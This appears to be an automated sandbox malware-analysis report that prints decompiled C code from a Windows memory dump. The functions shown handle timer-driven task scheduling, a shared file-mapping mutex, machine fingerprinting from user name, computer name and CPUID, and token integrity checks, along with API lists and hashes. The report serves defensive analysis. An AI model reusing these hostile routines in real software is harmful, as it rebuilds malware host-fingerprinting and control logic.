                                                                                                                                  0x031a45e3
                                                                                                                                  0x031a45eb
                                                                                                                                  0x031a45fe
                                                                                                                                  0x031a4604
                                                                                                                                  0x031a4608
                                                                                                                                  0x031a4614
                                                                                                                                  0x031a4619
                                                                                                                                  0x031a4622
                                                                                                                                  0x031a4633
                                                                                                                                  0x031a4637
                                                                                                                                  0x031a4640
                                                                                                                                  0x031a4646
                                                                                                                                  0x031a4653
                                                                                                                                  0x031a4660
                                                                                                                                  0x031a4666
                                                                                                                                  0x031a4672
                                                                                                                                  0x031a4678
                                                                                                                                  0x031a4679
                                                                                                                                  0x031a467e
                                                                                                                                  0x031a4684
                                                                                                                                  0x031a468a
                                                                                                                                  0x031a4691
                                                                                                                                  0x031a4698
                                                                                                                                  0x031a469e
                                                                                                                                  0x031a46a5
                                                                                                                                  0x031a46a9
                                                                                                                                  0x031a46b4
                                                                                                                                  0x031a46b9
                                                                                                                                  0x031a46bf
                                                                                                                                  0x031a46c8
                                                                                                                                  0x031a46c8
                                                                                                                                  0x031a46d9
                                                                                                                                  0x031a46d9
                                                                                                                                  0x031a46e8
                                                                                                                                  0x031a46e8
                                                                                                                                  0x031a46f7
                                                                                                                                  0x031a46f7
                                                                                                                                  0x031a4709
                                                                                                                                  0x031a4709
                                                                                                                                  0x031a4718
                                                                                                                                  0x031a4729

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A44BB
                                                                                                                                  • wsprintfA.USER32 ref: 031A4508
                                                                                                                                  • wsprintfA.USER32 ref: 031A4525
                                                                                                                                  • wsprintfA.USER32 ref: 031A4548
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 031A4558
                                                                                                                                  • wsprintfA.USER32 ref: 031A457A
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 031A458A
                                                                                                                                  • wsprintfA.USER32 ref: 031A45C1
                                                                                                                                  • wsprintfA.USER32 ref: 031A45E1
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031A45FE
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A460E
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(05BD9570), ref: 031A4622
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(05BD9570), ref: 031A4640
                                                                                                                                    • Part of subcall function 031A1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,031A4653,?,05BD95B0), ref: 031A199F
                                                                                                                                    • Part of subcall function 031A1974: lstrlen.KERNEL32(?,?,?,031A4653,?,05BD95B0), ref: 031A19A7
                                                                                                                                    • Part of subcall function 031A1974: strcpy.NTDLL ref: 031A19BE
                                                                                                                                    • Part of subcall function 031A1974: lstrcat.KERNEL32(00000000,?), ref: 031A19C9
                                                                                                                                    • Part of subcall function 031A1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,031A4653,?,05BD95B0), ref: 031A19E6
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,031AC2AC,?,05BD95B0), ref: 031A4672
                                                                                                                                    • Part of subcall function 031A38CA: lstrlen.KERNEL32(05BD9B10,00000000,00000000,7691C740,031A467E,00000000), ref: 031A38DA
                                                                                                                                    • Part of subcall function 031A38CA: lstrlen.KERNEL32(?), ref: 031A38E2
                                                                                                                                    • Part of subcall function 031A38CA: lstrcpy.KERNEL32(00000000,05BD9B10), ref: 031A38F6
                                                                                                                                    • Part of subcall function 031A38CA: lstrcat.KERNEL32(00000000,?), ref: 031A3901
                                                                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 031A4691
                                                                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 031A4698
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 031A46A5
                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 031A46A9
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 031A46D9
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 031A46E8
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,05BD95B0), ref: 031A46F7
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 031A4709
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?), ref: 031A4718
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3963266935-8415677
                                                                                                                                  • Opcode ID: 289b54f7180b0d78b888cd3e0702f2885f8c9d270d12e6bc8fcaee1a128fef10
                                                                                                                                  • Instruction ID: 617c99960048bf660ec0bab4df219d2c7173c3ad69d1f45f3b217e305434f680
                                                                                                                                  • Opcode Fuzzy Hash: 289b54f7180b0d78b888cd3e0702f2885f8c9d270d12e6bc8fcaee1a128fef10
                                                                                                                                  • Instruction Fuzzy Hash: CC61ABB9500E00AFC729EB68ED48E567BA8FB4C352F050515F908C7654DB34E886DBB5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A5461, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 150timememoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E031A5461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x31ad278);
					_v20 = 0;
					_v16 = 0;
					L031AAED0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x31ad2a4; // 0x2e0
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x31ad284 = 5;
						} else {
							_t68 = E031A502E(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x31ad298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E031A577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E031A2107(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x31ad27c);
							goto L21;
						} else {
							__eflags =  *0x31ad280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E031A47D5();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x31ad280);
								L21:
								L031AAED0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x31ad270, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                                                                                                  0x031a5461
                                                                                                                                  0x031a5473
                                                                                                                                  0x031a5476
                                                                                                                                  0x031a5482
                                                                                                                                  0x031a5488
                                                                                                                                  0x031a548d
                                                                                                                                  0x031a55f4
                                                                                                                                  0x031a5493
                                                                                                                                  0x031a5493
                                                                                                                                  0x031a5495
                                                                                                                                  0x031a549a
                                                                                                                                  0x031a549b
                                                                                                                                  0x031a54a1
                                                                                                                                  0x031a54a4
                                                                                                                                  0x031a54a7
                                                                                                                                  0x031a54b5
                                                                                                                                  0x031a54c0
                                                                                                                                  0x031a54c3
                                                                                                                                  0x031a54c5
                                                                                                                                  0x031a54d2
                                                                                                                                  0x031a54dc
                                                                                                                                  0x031a54de
                                                                                                                                  0x031a54e3
                                                                                                                                  0x031a54e8
                                                                                                                                  0x031a54f3
                                                                                                                                  0x031a54f3
                                                                                                                                  0x031a54ea
                                                                                                                                  0x031a54ea
                                                                                                                                  0x031a54f1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a54f1
                                                                                                                                  0x031a54fd
                                                                                                                                  0x00000000
                                                                                                                                  0x031a5500
                                                                                                                                  0x031a5504
                                                                                                                                  0x031a550f
                                                                                                                                  0x031a550f
                                                                                                                                  0x031a5516
                                                                                                                                  0x031a551f
                                                                                                                                  0x031a5526
                                                                                                                                  0x031a552f
                                                                                                                                  0x031a5532
                                                                                                                                  0x031a5535
                                                                                                                                  0x031a553a
                                                                                                                                  0x031a553f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a5541
                                                                                                                                  0x031a5544
                                                                                                                                  0x031a5547
                                                                                                                                  0x031a554a
                                                                                                                                  0x00000000
                                                                                                                                  0x031a554c
                                                                                                                                  0x031a555b
                                                                                                                                  0x031a555b
                                                                                                                                  0x00000000
                                                                                                                                  0x031a5589
                                                                                                                                  0x031a5589
                                                                                                                                  0x031a558e
                                                                                                                                  0x031a55ad
                                                                                                                                  0x031a55af
                                                                                                                                  0x031a55b4
                                                                                                                                  0x031a55b5
                                                                                                                                  0x00000000
                                                                                                                                  0x031a5590
                                                                                                                                  0x031a5590
                                                                                                                                  0x031a5596
                                                                                                                                  0x00000000
                                                                                                                                  0x031a5598
                                                                                                                                  0x031a5598
                                                                                                                                  0x031a559d
                                                                                                                                  0x031a559f
                                                                                                                                  0x031a55a4
                                                                                                                                  0x031a55a5
                                                                                                                                  0x031a55bb
                                                                                                                                  0x031a55bb
                                                                                                                                  0x031a55c3
                                                                                                                                  0x031a55ce
                                                                                                                                  0x031a55d1
                                                                                                                                  0x031a55dc
                                                                                                                                  0x031a55de
                                                                                                                                  0x031a55e1
                                                                                                                                  0x031a55e3
                                                                                                                                  0x00000000
                                                                                                                                  0x031a55e9
                                                                                                                                  0x00000000
                                                                                                                                  0x031a55e9
                                                                                                                                  0x031a55e3
                                                                                                                                  0x031a5596
                                                                                                                                  0x00000000
                                                                                                                                  0x031a558e
                                                                                                                                  0x031a555e
                                                                                                                                  0x031a5560
                                                                                                                                  0x031a5563
                                                                                                                                  0x031a5564
                                                                                                                                  0x031a5564
                                                                                                                                  0x031a5568
                                                                                                                                  0x031a5572
                                                                                                                                  0x031a5572
                                                                                                                                  0x031a5578
                                                                                                                                  0x031a557b
                                                                                                                                  0x031a557b
                                                                                                                                  0x031a5581
                                                                                                                                  0x031a5581
                                                                                                                                  0x031a55fe
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • memset.NTDLL ref: 031A5476
                                                                                                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 031A5482
                                                                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 031A54A7
                                                                                                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 031A54C3
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 031A54DC
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 031A5572
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 031A5581
                                                                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 031A55BB
                                                                                                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,031A53C9,?), ref: 031A55D1
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 031A55DC
                                                                                                                                    • Part of subcall function 031A502E: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05BD9370,00000000,?,74E5F710,00000000,74E5F730), ref: 031A507D
                                                                                                                                    • Part of subcall function 031A502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05BD93A8,?,00000000,30314549,00000014,004F0053,05BD9364), ref: 031A511A
                                                                                                                                    • Part of subcall function 031A502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,031A54EF), ref: 031A512C
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A55EE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                  • String ID: Ut$@MtNt
                                                                                                                                  • API String ID: 3521023985-969920318
                                                                                                                                  • Opcode ID: daedf046ec9bd70322d992889556cf6f525fbc2365d93645fb9de1eb2574bbb9
                                                                                                                                  • Instruction ID: b0935c69ec34354703cc3a0d389e793d08f91bd0e74210ad3011761965f87550
                                                                                                                                  • Opcode Fuzzy Hash: daedf046ec9bd70322d992889556cf6f525fbc2365d93645fb9de1eb2574bbb9
                                                                                                                                  • Instruction Fuzzy Hash: 22519F79805A28ABCF11EFA9DC449EEBFBAEF0D322F144116F410E6144D7308684DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A3598, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E031A3598(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L031AAECA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x31ad2e0; // 0x2a2a5a8
				_t5 = _t13 + 0x31ae876; // 0x5bd8e1e
				_t6 = _t13 + 0x31ae59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L031AABEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x31ad2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                                                                                                  0x031a3598
                                                                                                                                  0x031a35a0
                                                                                                                                  0x031a35a4
                                                                                                                                  0x031a35aa
                                                                                                                                  0x031a35af
                                                                                                                                  0x031a35b4
                                                                                                                                  0x031a35b7
                                                                                                                                  0x031a35ba
                                                                                                                                  0x031a35bf
                                                                                                                                  0x031a35c0
                                                                                                                                  0x031a35c3
                                                                                                                                  0x031a35c8
                                                                                                                                  0x031a35cf
                                                                                                                                  0x031a35d9
                                                                                                                                  0x031a35db
                                                                                                                                  0x031a35dc
                                                                                                                                  0x031a35df
                                                                                                                                  0x031a35fb
                                                                                                                                  0x031a3601
                                                                                                                                  0x031a3605
                                                                                                                                  0x031a3653
                                                                                                                                  0x031a3607
                                                                                                                                  0x031a3614
                                                                                                                                  0x031a3624
                                                                                                                                  0x031a362c
                                                                                                                                  0x031a363e
                                                                                                                                  0x031a3642
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a362e
                                                                                                                                  0x031a3631
                                                                                                                                  0x031a3636
                                                                                                                                  0x031a3638
                                                                                                                                  0x031a3638
                                                                                                                                  0x031a3616
                                                                                                                                  0x031a3618
                                                                                                                                  0x031a3644
                                                                                                                                  0x031a3645
                                                                                                                                  0x031a3645
                                                                                                                                  0x031a3614
                                                                                                                                  0x031a365a

                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,031A529C,?,?,4D283A53,?,?), ref: 031A35A4
                                                                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 031A35BA
                                                                                                                                  • _snwprintf.NTDLL ref: 031A35DF
                                                                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,031AD2E4,00000004,00000000,00001000,?), ref: 031A35FB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,031A529C,?,?,4D283A53), ref: 031A360D
                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 031A3624
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,031A529C,?,?), ref: 031A3645
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,031A529C,?,?,4D283A53), ref: 031A364D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 1814172918-3251738875
                                                                                                                                  • Opcode ID: f9ce441610530ef6308caf16e46ff3ad06a6f65919d7bb878e6489c976a7fa2f
                                                                                                                                  • Instruction ID: 4032ee3cee525861a9deeff8e1d90c39f4519414923cacc0496ebb6c7d404fbc
                                                                                                                                  • Opcode Fuzzy Hash: f9ce441610530ef6308caf16e46ff3ad06a6f65919d7bb878e6489c976a7fa2f
                                                                                                                                  • Instruction Fuzzy Hash: B521D27EA00A04BBC715EB68DD05F9E77A9AF4C702F250121F61AE72C0DB70D645DBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031AA82B, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E031AA82B(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x31ad2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E031A60B6( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x31ad2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x31ad270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E031A789B(_v8 + _v8, _t64);
							}
							HeapFree( *0x31ad270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x31ad270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E031A789B(_v8 + _v8, _t64);
						}
						HeapFree( *0x31ad270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                                                                                                  0x031aa82b
                                                                                                                                  0x031aa833
                                                                                                                                  0x031aa837
                                                                                                                                  0x031aa83a
                                                                                                                                  0x031aa83f
                                                                                                                                  0x031aa841
                                                                                                                                  0x031aa846
                                                                                                                                  0x031aa846
                                                                                                                                  0x031aa84c
                                                                                                                                  0x031aa84e
                                                                                                                                  0x031aa85b
                                                                                                                                  0x031aa8bc
                                                                                                                                  0x031aa85d
                                                                                                                                  0x031aa862
                                                                                                                                  0x031aa868
                                                                                                                                  0x031aa86d
                                                                                                                                  0x031aa87b
                                                                                                                                  0x031aa87f
                                                                                                                                  0x031aa88e
                                                                                                                                  0x031aa895
                                                                                                                                  0x031aa89c
                                                                                                                                  0x031aa89c
                                                                                                                                  0x031aa8a7
                                                                                                                                  0x031aa8a7
                                                                                                                                  0x031aa87f
                                                                                                                                  0x031aa86d
                                                                                                                                  0x031aa8be
                                                                                                                                  0x031aa8c4
                                                                                                                                  0x031aa8ce
                                                                                                                                  0x031aa8d0
                                                                                                                                  0x031aa8d5
                                                                                                                                  0x031aa8e4
                                                                                                                                  0x031aa8e8
                                                                                                                                  0x031aa8f3
                                                                                                                                  0x031aa8fa
                                                                                                                                  0x031aa901
                                                                                                                                  0x031aa901
                                                                                                                                  0x031aa90d
                                                                                                                                  0x031aa90d
                                                                                                                                  0x031aa8e8
                                                                                                                                  0x031aa918
                                                                                                                                  0x031aa91a
                                                                                                                                  0x031aa91d
                                                                                                                                  0x031aa91f
                                                                                                                                  0x031aa922
                                                                                                                                  0x031aa925
                                                                                                                                  0x031aa92f
                                                                                                                                  0x031aa933
                                                                                                                                  0x031aa937

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 031AA862
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 031AA879
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 031AA886
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,031A538B), ref: 031AA8A7
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 031AA8CE
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 031AA8E2
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 031AA8EF
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,031A538B), ref: 031AA90D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3239747167-8415677
                                                                                                                                  • Opcode ID: e4fdb65b613725ff479bea075df951453a18d760acb5c97c3ba478abaf33c383
                                                                                                                                  • Instruction ID: e67d1f4ab1b73865b085516af6ff70f810bdbd6a2de77c99c46d7121f215dde0
                                                                                                                                  • Opcode Fuzzy Hash: e4fdb65b613725ff479bea075df951453a18d760acb5c97c3ba478abaf33c383
                                                                                                                                  • Instruction Fuzzy Hash: 79310A75A00A05AFDB24EFA9D980A6EB7F9FF4C202F15446AE505D3214DB30EA41DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A4151, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A4151(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x31ad294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E031A75F6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E031A4AAB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                                                                                                  0x031a415e
                                                                                                                                  0x031a4165
                                                                                                                                  0x031a416c
                                                                                                                                  0x031a4180
                                                                                                                                  0x031a418b
                                                                                                                                  0x031a41a3
                                                                                                                                  0x031a41b0
                                                                                                                                  0x031a41b3
                                                                                                                                  0x031a41b8
                                                                                                                                  0x031a41c3
                                                                                                                                  0x031a41c7
                                                                                                                                  0x031a41d6
                                                                                                                                  0x031a41da
                                                                                                                                  0x031a41f6
                                                                                                                                  0x031a41f6
                                                                                                                                  0x031a41fa
                                                                                                                                  0x031a41fa
                                                                                                                                  0x031a41ff
                                                                                                                                  0x031a4203
                                                                                                                                  0x031a4209
                                                                                                                                  0x031a420a
                                                                                                                                  0x031a4211
                                                                                                                                  0x031a4217

                                                                                                                                  APIs
                                                                                                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 031A4183
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 031A41A3
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 031A41B3
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 031A4203
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 031A41D6
                                                                                                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 031A41DE
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 031A41EE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
